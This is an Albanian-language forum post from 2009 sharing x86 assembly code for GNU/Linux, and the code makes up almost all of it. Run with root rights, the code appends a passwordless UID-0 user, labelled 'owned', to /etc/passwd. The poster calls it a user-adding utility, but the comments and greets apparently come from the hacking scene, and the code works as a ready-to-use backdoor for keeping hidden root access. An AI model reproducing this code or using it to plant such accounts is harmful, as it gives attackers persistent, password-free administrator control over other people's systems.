Shtuarja e shfrytzuesve në GNU/Linux nëpërmjet ASM kodit [Assembly

    Share

    Onyx.
    Administrator
    Administrator

    Posts : 414
    Reputation : 0
    Join date : 23/12/2009

    Shtuarja e shfrytzuesve në GNU/Linux nëpërmjet ASM kodit [Assembly

    Mesazh nga Onyx. prej Wed Dec 23, 2009 3:58 pm

    Shtuarja e shfrytzuesve në GNU/Linux nëpërmjet ASM kodit [Assembly]

    --------------------------------------------------------------------------------

    Kodi që është i përfshirë në këtë postim nuk është kod eksploatues për ndonjë prekshmëri, por është thjeshtë mënyrë për shtuarjen e shfrytzuesit në GNU/Linux. Ky kod është i paraparë për procesorët që e kanë IA-32 arkitekturën (pra, familja e x86 procesorëve).


    Kodi:
    # 32 bit asm code written in at&t syntax for the x86 processors wich adds
    # an user with root rights and no password
    # the user is specified as an argument from the command line
    # i didn't implement error checking for the argument so if you get a
    # segfault it's because you haven't typed an argument
    # i added some error checking for the open syscall, if you don't have
    # permission to open it or god knows what else it will exit with 2
    # as it's status code, it doesn't mean anything it's a random number
    # usage ./add username
    # oh one last thing, you must have root rights to do this
    # greets UnPlugged, kiddie, Thugking,ins1der(trixter) and #nerds@undernet
    # coded by Serial Killah mail

    .section .data
    str:
    .ascii "::0:0:owned:/:/bin/sh\n" # modify this as you wish
    file:
    .ascii "/etc/passwd" # if you modify the file name be sure to aldo modify the FLENGTH constant

    .equ FLAGS, 02001 # opens the file in WR_ONLY and APPEND mode
    .equ PERM, 0644 # file permissions
    .equ EXIT, 1 # exit syscall
    .equ WRITE, 4 # write syscall
    .equ OPEN, 5 # i wonder..
    .equ CLOSE, 6 # uhm what could it be
    .equ SYSCALL, 0x80 # the interrupt
    .equ FLENGTH, 11 # file length
    .section .text
    .globl _start
    _start:
    # OPEN THE FILE
    movl $OPEN, %eax # moving the open syscall into %eax
    movl $file, %ebx # moving the address of file into %ebx
    movl $FLAGS, %ecx # moving the write mode into %ecx
    movl $PERM, %edx # opening the file in u=rw,g=r,o=r mode
    int $SYSCALL # waking up the kernel, heh

    cmpl $0, %eax # checking to see if the open syscall worked, if not exiting with a different status
    jle error # jumping to error

    movl %eax, %esi # moving the file descriptor into %esi, or the errno
    pushl 8(%esp) # putting the argument on the stack
    call strlen # calling the strlen function
    addl $4, %esp # removing the argument from the stack

    # WRITE 8(%esp)
    movl %eax, %edx # moving the argument length into %edx
    movl $WRITE, %eax # moving the write syscall into %eax
    movl %esi, %ebx # moving the file descriptor into %ebx
    movl 8(%esp), %ecx # moving the argument into %ecx
    int $SYSCALL # ...

    pushl $str # putting the rest of the string on the stack
    call strlen # again calling the strlen function
    addl $4, %esp # bla bla

    subl $FLENGTH, %eax # substracting the file length from str

    # WRITE $str
    movl %eax, %edx #
    movl $WRITE, %eax # same as above only it's the str we are writing this time
    movl %esi, %ebx #
    movl $str, %ecx #
    int $SYSCALL #

    # CLOSE
    movl $CLOSE, %eax # moving the close syscall into %eax
    int $SYSCALL # %ebx already has the file descriptor so all we have to do is call the interrupt handler

    # EXIT
    movl $EXIT, %eax # moving the exit syscall into %eax
    movl $0, %ebx # 0 is the status code, check it by typing "echo $?"
    int $SYSCALL # calling the interrupt handler

    error:
    movl $1, %eax # same as above
    movl $2, %ebx # the only thing different is that we put 2 as the status code wich means an error
    int $SYSCALL # ..

    .type strlen, @function # declaring strlen as a function
    strlen: # adjusting it's label
    pushl %ebp # pushing %ebp on the stack
    movl %esp, %ebp # moving the stack pointer into %ebp
    movl 8(%ebp), %ebx # puttin whatever it is we pushed on the stack into %ebx
    movl $0, %edi # movingo 0 into %edi
    count: # the place where the counting really happens
    movb (%ebx,%edi,1), %al # moving one byte at a time from %ebx into %al
    cmpb $0, %al # checking these bytes against 0 to see if it's the end of the string
    je exit # if it is then jump to exit
    incl %edi # if not increment edi so we can copy the next byte
    jmp count # and jump to count, the beginning of the loop
    exit: # exiting the function
    movl %edi, %eax # moving the number of bytes (string length) into %eax
    movl %ebp, %esp # moving the base pointer into %esp
    popl %ebp # taking off into %ebp whatever is at %esp
    ret # returning to the main stuffE di që "protected mode" e procesorëve përmbi 80286 bën mbrojtjen e memories, pra nuk lejon të bëhet shkruarja kudo në memoria, por çka e ndalon Assembler kodin nga shkruajtja në qfarëdo lokacioni të hard diskut? Nëse dikush ka nodnjë material/hiperlidhje për këtë gjë, ju lutëm dërgomani.

      Ora është Sat Dec 03, 2016 7:49 am